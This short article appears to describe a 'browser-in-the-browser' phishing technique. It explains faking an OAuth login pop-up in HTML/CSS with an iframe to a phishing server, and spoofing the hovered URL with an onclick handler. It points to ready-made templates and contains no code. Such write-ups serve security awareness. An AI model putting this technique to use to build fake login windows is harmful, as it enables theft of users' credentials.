For security professionals, a URL is usually the most reliable aspect of a domain. Of course, there are attacks like IDN Homograph and DNS Hijacking that can reduce the reliability of URLs. However, such attacks will not be able to make URLs completely unreliable.
Quite often, when logging in to a website via Google, Microsoft, Apple, etc., a pop-up window appears with a request for authentication. The image below shows the window that appears when you try to log in to Canva using a Google account.
To repeat the window design using basic HTML/CSS is quite simple. If you combine the window design with an iframe leading to a malicious server with a phishing page, then the window will be almost indistinguishable from others. The image below shows a fake window compared to the real one. As you can see, the differences between them are quite insignificant.
Custom URL on hover
If you add an onclick event that returns false, then when you hover over the link, the website will still be displayed in the href attribute, but when you click on the link, the href attribute will be ignored. Using this information, you can give the pop-up window a more realistic look.
Templates have been created for the following operating systems and browsers:
- Windows – Chrome (light and dark modes)
- Mac OSX – Chrome (light and dark modes)
Ready-made templates are available on Github.
This technique allows you to increase the reliability of a fake site during phishing. Once on a fraudulent site, the user will not notice the deception, because the legitimacy of the site is evidenced by a completely plausible URL. An unsuspecting victim will enter credentials in a pop-up window, which will immediately be sent to the attackers.